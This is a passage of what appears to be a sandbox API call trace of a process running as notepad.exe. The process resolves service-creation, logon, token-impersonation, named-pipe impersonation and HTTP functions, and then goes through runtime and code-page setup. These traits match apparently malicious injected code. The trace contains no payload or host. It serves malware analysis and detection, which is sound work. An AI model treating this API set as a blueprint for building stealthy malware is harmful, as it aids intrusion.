[0083.271] GetProcAddress (hModule=0x769b0000, lpProcName="IsValidCodePage") returned 0x769c444b [0083.271] GetProcAddress (hModule=0x769b0000, lpProcName="GetCPInfo") returned 0x769c5141 [0083.271] GetProcAddress (hModule=0x769b0000, lpProcName="GetSystemTimeAsFileTime") returned 0x769c34b9 [0083.271] GetProcAddress (hModule=0x769b0000, lpProcName="QueryPerformanceCounter") returned 0x769c1705 [0083.271] GetProcAddress (hModule=0x769b0000, lpProcName="GetEnvironmentStringsW") returned 0x769c519b [0083.272] GetProcAddress (hModule=0x769b0000, lpProcName="FreeEnvironmentStringsW") returned 0x769c5183 [0083.272] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileA") returned 0x769c537e [0083.272] GetProcAddress (hModule=0x769b0000, lpProcName="Sleep") returned 0x769c10ff [0083.272] GetProcAddress (hModule=0x769b0000, lpProcName="UpdateProcThreadAttribute") returned 0x76fef8a8 [0083.272] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleW") returned 0x769c3460 [0083.272] GetProcAddress (hModule=0x769b0000, lpProcName="DeleteFileA") returned 0x769c53fc [0083.272] GetProcAddress (hModule=0x769b0000, lpProcName="CreateDirectoryA") returned 0x769ed516 [0083.272] GetProcAddress (hModule=0x769b0000, lpProcName="RemoveDirectoryA") returned 0x76a44a5f [0083.272] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentThreadId") returned 0x769c1430 [0083.273] GetProcAddress (hModule=0x769b0000, lpProcName="GetCommandLineA") returned 0x769c5159 [0083.273] GetProcAddress (hModule=0x769b0000, lpProcName="UnhandledExceptionFilter") returned 0x769e76f7 [0083.273] GetProcAddress (hModule=0x769b0000, lpProcName="SetUnhandledExceptionFilter") returned 0x769c8781 [0083.273] GetProcAddress (hModule=0x769b0000, lpProcName="IsDebuggerPresent") returned 0x769c4a15 [0083.273] GetProcAddress (hModule=0x769b0000, lpProcName="HeapCreate") returned 0x769c49e5 [0083.273] GetProcAddress (hModule=0x769b0000, lpProcName="HeapDestroy") returned 0x769c3567 [0083.273] GetProcAddress (hModule=0x769b0000, lpProcName="DeleteCriticalSection") returned 0x77a145f5 [0083.273] GetProcAddress (hModule=0x769b0000, lpProcName="LeaveCriticalSection") returned 0x77a02270 [0083.273] GetProcAddress (hModule=0x769b0000, lpProcName="EnterCriticalSection") returned 0x77a022b0 [0083.273] GetProcAddress (hModule=0x769b0000, lpProcName="HeapReAlloc") returned 0x77a21f6e [0083.274] GetProcAddress (hModule=0x769b0000, lpProcName="GetStdHandle") returned 0x769c516b [0083.274] GetProcAddress (hModule=0x769b0000, lpProcName="TlsGetValue") returned 0x769c11e0 [0083.274] GetProcAddress (hModule=0x769b0000, lpProcName="TlsAlloc") returned 0x769c4965 [0083.274] GetProcAddress (hModule=0x769b0000, lpProcName="TlsSetValue") returned 0x769c14db [0083.274] GetProcAddress (hModule=0x769b0000, lpProcName="TlsFree") returned 0x769c3537 [0083.274] GetProcAddress (hModule=0x769b0000, lpProcName="InterlockedIncrement") returned 0x769c13e0 [0083.274] GetProcAddress (hModule=0x769b0000, lpProcName="InterlockedDecrement") returned 0x769c13d0 [0083.274] GetProcAddress (hModule=0x769b0000, lpProcName="FreeLibrary") returned 0x769c3478 [0083.274] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x769c18f6 [0083.274] GetProcAddress (hModule=0x769b0000, lpProcName="RtlUnwind") returned 0x769ed1b3 [0083.274] GetProcAddress (hModule=0x769b0000, lpProcName="WideCharToMultiByte") returned 0x769c16ed [0083.274] GetProcAddress (hModule=0x769b0000, lpProcName="GetConsoleCP") returned 0x76a681b7 [0083.275] GetProcAddress (hModule=0x769b0000, lpProcName="GetConsoleMode") returned 0x769c1328 [0083.275] GetProcAddress (hModule=0x769b0000, lpProcName="SetHandleCount") returned 0x769ccae1 [0083.275] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileType") returned 0x769c34e1 [0083.275] GetProcAddress (hModule=0x769b0000, lpProcName="SetFilePointer") returned 0x769c17b1 [0083.275] GetProcAddress (hModule=0x769b0000, lpProcName="FreeEnvironmentStringsA") returned 0x769ce301 [0083.275] GetProcAddress (hModule=0x769b0000, lpProcName="GetEnvironmentStrings") returned 0x769ce319 [0083.275] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameW") returned 0x769c4908 [0083.275] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x76c20000 [0083.275] GetProcAddress (hModule=0x76c20000, lpProcName="FreeSid") returned 0x76c3412e [0083.275] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteService") returned 0x76c4715c [0083.275] GetProcAddress (hModule=0x76c20000, lpProcName="CreateServiceA") returned 0x76c63158 [0083.276] GetProcAddress (hModule=0x76c20000, lpProcName="CryptReleaseContext") returned 0x76c2e124 [0083.276] GetProcAddress (hModule=0x76c20000, lpProcName="CryptAcquireContextA") returned 0x76c291dd [0083.276] GetProcAddress (hModule=0x76c20000, lpProcName="CryptGenRandom") returned 0x76c2dfc8 [0083.276] GetProcAddress (hModule=0x76c20000, lpProcName="LogonUserA") returned 0x76c62654 [0083.276] GetProcAddress (hModule=0x76c20000, lpProcName="CheckTokenMembership") returned 0x76c2df04 [0083.276] GetProcAddress (hModule=0x76c20000, lpProcName="RevertToSelf") returned 0x76c31562 [0083.276] GetProcAddress (hModule=0x76c20000, lpProcName="AllocateAndInitializeSid") returned 0x76c340e6 [0083.276] GetProcAddress (hModule=0x76c20000, lpProcName="LookupAccountSidA") returned 0x76c61daa [0083.276] GetProcAddress (hModule=0x76c20000, lpProcName="GetTokenInformation") returned 0x76c3431c [0083.276] GetProcAddress (hModule=0x76c20000, lpProcName="RegCloseKey") returned 0x76c3469d [0083.277] GetProcAddress (hModule=0x76c20000, lpProcName="RegEnumKeyA") returned 0x76c4a299 [0083.277] GetProcAddress (hModule=0x76c20000, lpProcName="RegEnumValueA") returned 0x76c2cf49 [0083.277] GetProcAddress (hModule=0x76c20000, lpProcName="RegOpenCurrentUser") returned 0x76c315ad [0083.277] GetProcAddress (hModule=0x76c20000, lpProcName="RegOpenKeyExA") returned 0x76c34907 [0083.277] GetProcAddress (hModule=0x76c20000, lpProcName="GetUserNameA") returned 0x76c4a4b4 [0083.277] GetProcAddress (hModule=0x76c20000, lpProcName="DuplicateTokenEx") returned 0x76c2ca24 [0083.277] GetProcAddress (hModule=0x76c20000, lpProcName="CreateProcessWithTokenW") returned 0x76c6531f [0083.277] GetProcAddress (hModule=0x76c20000, lpProcName="CreateProcessWithLogonW") returned 0x76c652e9 [0083.277] GetProcAddress (hModule=0x76c20000, lpProcName="CreateProcessAsUserA") returned 0x76c62538 [0083.277] GetProcAddress (hModule=0x76c20000, lpProcName="AdjustTokenPrivileges") returned 0x76c3418e [0083.277] GetProcAddress (hModule=0x76c20000, lpProcName="ImpersonateNamedPipeClient") returned 0x76c63369 [0083.277] GetProcAddress (hModule=0x76c20000, lpProcName="ImpersonateLoggedOnUser") returned 0x76c2c57a [0083.278] GetProcAddress (hModule=0x76c20000, lpProcName="LookupPrivilegeValueA") returned 0x76c3404a [0083.278] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThreadToken") returned 0x76c3432c [0083.278] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcessToken") returned 0x76c34304 [0083.278] GetProcAddress (hModule=0x76c20000, lpProcName="OpenSCManagerA") returned 0x76c32bd8 [0083.278] GetProcAddress (hModule=0x76c20000, lpProcName="QueryServiceStatus") returned 0x76c32a86 [0083.278] GetProcAddress (hModule=0x76c20000, lpProcName="StartServiceA") returned 0x76c63543 [0083.278] GetProcAddress (hModule=0x76c20000, lpProcName="CloseServiceHandle") returned 0x76c3369c [0083.278] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x76d80000 [0085.938] GetProcAddress (hModule=0x76d80000, lpProcName="InternetConnectA") returned 0x76da49e9 [0085.938] GetProcAddress (hModule=0x76d80000, lpProcName="InternetQueryDataAvailable") returned 0x76da5e5d [0085.938] GetProcAddress (hModule=0x76d80000, lpProcName="InternetReadFile") returned 0x76d9b406 [0085.938] GetProcAddress (hModule=0x76d80000, lpProcName="InternetSetOptionA") returned 0x76d975e8 [0085.939] GetProcAddress (hModule=0x76d80000, lpProcName="HttpOpenRequestA") returned 0x76da4c7d [0085.939] GetProcAddress (hModule=0x76d80000, lpProcName="HttpSendRequestA") returned 0x76e118f8 [0085.939] GetProcAddress (hModule=0x76d80000, lpProcName="InternetOpenA") returned 0x76daf18e [0085.939] GetProcAddress (hModule=0x76d80000, lpProcName="InternetCloseHandle") returned 0x76d9ab49 [0085.939] GetProcAddress (hModule=0x76d80000, lpProcName="InternetQueryOptionA") returned 0x76d91b56 [0085.939] GetProcAddress (hModule=0x76d80000, lpProcName="HttpQueryInfoA") returned 0x76d9a33e [0085.939] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75610000 [0086.560] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef89c | out: lpSystemTimeAsFileTime=0x2ef89c*(dwLowDateTime=0x7801b6e0, dwHighDateTime=0x1d809f7)) [0086.560] GetCurrentProcessId () returned 0xf48 [0086.560] GetCurrentThreadId () returned 0xf50 [0086.560] GetTickCount () returned 0x1c23b15 [0086.560] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef894 | out: lpPerformanceCount=0x2ef894*=2967018676764) returned 1 [0086.567] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1f50000 [0086.574] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0086.574] GetProcAddress (hModule=0x769b0000, lpProcName="FlsAlloc") returned 0x769c4ee3 [0086.575] GetProcAddress (hModule=0x769b0000, lpProcName="FlsGetValue") returned 0x769c1252 [0086.575] GetProcAddress (hModule=0x769b0000, lpProcName="FlsSetValue") returned 0x769c41c0 [0086.575] GetProcAddress (hModule=0x769b0000, lpProcName="FlsFree") returned 0x769c354f [0086.581] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0086.581] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0086.583] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0086.584] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0086.584] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0086.584] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0086.584] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0086.584] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0086.584] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0086.585] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0086.585] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0086.585] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0086.585] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0086.585] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0086.586] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0086.586] GetProcAddress (hModule=0x769b0000, lpProcName="DecodePointer") returned 0x77a19d35 [0086.592] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x214) returned 0x1f507d0 [0086.593] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0086.593] GetProcAddress (hModule=0x769b0000, lpProcName="DecodePointer") returned 0x77a19d35 [0086.593] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0086.593] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0086.593] GetProcAddress (hModule=0x769b0000, lpProcName="DecodePointer") returned 0x77a19d35 [0086.600] GetCurrentThreadId () returned 0xf50 [0086.612] GetCommandLineA () returned="\"C:\\Windows\\SysWOW64\\notepad.exe\"" [0086.612] GetEnvironmentStringsW () returned 0x5811c0* [0086.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1415, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1415 [0086.612] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x587) returned 0x1f509f0 [0086.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1415, lpMultiByteStr=0x1f509f0, cbMultiByte=1415, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1415 [0086.612] FreeEnvironmentStringsW (penv=0x5811c0) returned 1 [0086.621] GetStartupInfoA (in: lpStartupInfo=0x2ef7ec | out: lpStartupInfo=0x2ef7ec*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SysWOW64\\notepad.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0086.621] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x800) returned 0x1f50f80 [0086.622] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0086.622] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0086.622] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0086.622] SetHandleCount (uNumber=0x20) returned 0x20 [0086.622] GetLastError () returned 0x0 [0086.622] SetLastError (dwErrCode=0x0) [0086.622] GetLastError () returned 0x0 [0086.622] SetLastError (dwErrCode=0x0) [0086.622] GetLastError () returned 0x0 [0086.622] SetLastError (dwErrCode=0x0) [0086.622] GetACP () returned 0x4e4 [0086.622] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x220) returned 0x1f51788 [0086.622] GetLastError () returned 0x0 [0086.622] SetLastError (dwErrCode=0x0) [0086.622] IsValidCodePage (CodePage=0x4e4) returned 1 [0086.622] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2ef7cc | out: lpCPInfo=0x2ef7cc) returned 1 [0086.622] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2ef298 | out: lpCPInfo=0x2ef298) returned 1 [0086.622] GetLastError () returned 0x0 [0086.623] SetLastError (dwErrCode=0x0) [0086.623] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x2ef228 | out: lpCharType=0x2ef228) returned 1 [0086.623] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef6ac, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0086.627] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef6ac, cbMultiByte=256, lpWideCharStr=0x2ef018, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿﴔ\x1cĀ") returned 256 [0086.627] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿﴔ\x1cĀ", cchSrc=256, lpCharType=0x2ef2ac | out: lpCharType=0x2ef2ac) returned 1 [0086.628] GetLastError () returned 0x0 [0086.628] SetLastError (dwErrCode=0x0) [0086.628] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0086.628] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef6ac, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0086.628] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef6ac, cbMultiByte=256, lpWideCharStr=0x2eefe8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0086.628] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0086.628] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x2eedd8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0086.628] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x2ef5ac, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x04S-¨ä÷.", lpUsedDefaultChar=0x0) returned 256 [0086.628] GetLastError () returned 0x0 [0086.628] SetLastError (dwErrCode=0x0) [0086.628] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef6ac, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0086.628] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef6ac, cbMultiByte=256, lpWideCharStr=0x2ef008, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0086.628] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0086.628] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x2eedf8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0086.628] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x2ef4ac, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 